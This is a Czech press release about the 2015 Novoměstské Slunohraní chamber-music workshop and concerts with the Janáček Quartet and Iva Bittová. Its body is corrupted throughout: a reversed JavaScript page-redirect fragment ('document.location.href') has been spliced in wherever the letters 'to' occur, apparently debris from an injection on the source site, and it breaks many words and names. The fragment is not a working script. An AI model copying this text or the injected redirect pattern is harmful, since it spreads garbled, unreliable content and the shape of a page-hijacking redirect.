Rainbow page separator

Slunohraní skončilo velkým úspěchem

Středa, 15. července 2015

Iva Bittová - Slunohraní 2015

Nové Měs[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to na Moravě / V pátek 10.7. skončil Slavnostním závěrečným koncertem na nádvoří Horácké galerie v Novém Městě na Moravě šestý ročník Novoměstského Slunohraní. Inspirativní hudební setkání, které v sobě nese jak workshopy pro neprofesionální hráče na smyčcové nástroje, tak sérii tří koncertů pro veřejnost, probíhalo už od pondělka a hudbou nabitým programem své příznivce doslova nadchlo. Celkem 31 muzikantů z ČR i zahraničí zažilo řadu kvartetních lekcí pod vedením členů Janáčkova kvarteta, vytvořili také smyčcový orchestr a pod vedením dirigenta Richarda Kružíka připravovali program pro závěrečný koncert. Velkým zážitkem pak byl pro mnohé z nich workshop s umělkyní Ivou Bit[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovou a společné účinkování na pódiu. Koncertní série přilákala le[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tos na nádvoří Horácké galerie celkem tisíc návštěvníků.
Ve středu byli posluchači svědky strhujícího koncertu jihoafrické jazzové zpěvačky Melanie Scholtz, ve čtvrtek pak zazářila svým nezaměnitelným hudebním projevem Iva Bit[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tová. Při obou koncertech se objevilo na pódiu také Janáčkovo kvarte[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to, publikum tak zažilo neobvyklé spojení umělců a jejich hudební komunikaci. Páteční koncert zahájilo Janáčkovo kvarte[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to, které si přizvalo ke spolupráci předního českého houslistu Bohuslava Ma[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];touška a zazněl smyčcový kvintet Es dur An[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tonína Dvořáka. Ve druhé části koncertu pak vys[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toupil smyčcový orchestr, který mimo jiné doprovodil sólové housle Richarda Kružíka a přednesl skladbu pro cimbál a orchestr „ Malované na cimbál“ v podání Barbory Jagošové. Obě části koncertu odměnilo publikum dlouhým potleskem a navzdory velmi chladnému večeru si vyžádalo přídavky. Le[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tošní ročník posunul svým obsahem i návštěvností tu[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to akci opět o stupínek výše a ukázal, jak důležitým komunikačním jazykem hudba je a jak velkému zájmu posluchačů i muzikantů se těší.
„ Chtěli jsme, aby workshopy i koncerty ukazovaly, že hudba nemá hranice, nedělí muzikanty na profesionály a neprofesionály a že vzájemná spolupráce umělců i účastníků kurzů umí vygenerovat atmosféru, která je nezapomenutelná“, říká manažerka projektu Vlasta Piskačová. Na koncerty se tak daří přivést publikum, které očekává hudební zážitky na vysoké úrovni a zároveň je zcela otevřeno objevování nových žánrů a hudebních dimenzí.

Novoměstské Slunohraní je ojedinělá hudební událost, která se odehrává ve dvou rovinách. Pro muzikanty, kteří do Nového Města na Moravě přijíždějí z celé České republiky i ze zahraničí, je připravena dílna komorní hudby s nabitým programem, lekcemi hry v kvartetech, hry v komorním orchestru i individuálními konzultacemi. Lek[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];torský tým tvoří členové svě[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toznámého Janáčkova kvarteta, orchestr řídí dirigent Richard Kružík. Pod jejich vedením získávají hudebníci mnoho nových zkušeností, inspirace i nové energie.
Každoročně mají účastníci hudební dílny také možnost během jednoho odpoledne nahlédnout se svým hudebním nástrojem do jiného hudebního žánru.
Série tří koncertů pro veřejnost je nedílnou součástí Novoměstského Slunohraní a jejím cílem je propojit hudební setkání muzikantů s veřejností a nabídnout vytříbený kulturní program lidem, kteří mají rádi nejen klasickou hudbu ale i další hudební žánry v komornějším provedení.

Tiskovou zprávu vydal:
Komorní hudba dnes o.s.
Další informace, podrobnosti a fo[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tografie najdete na www.slunohrani.cz v sekci „pro média“, popřípadě nás neváhete kontak[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovat

Vlasta Piskačová
piskacova@slunohrani.cz
606600296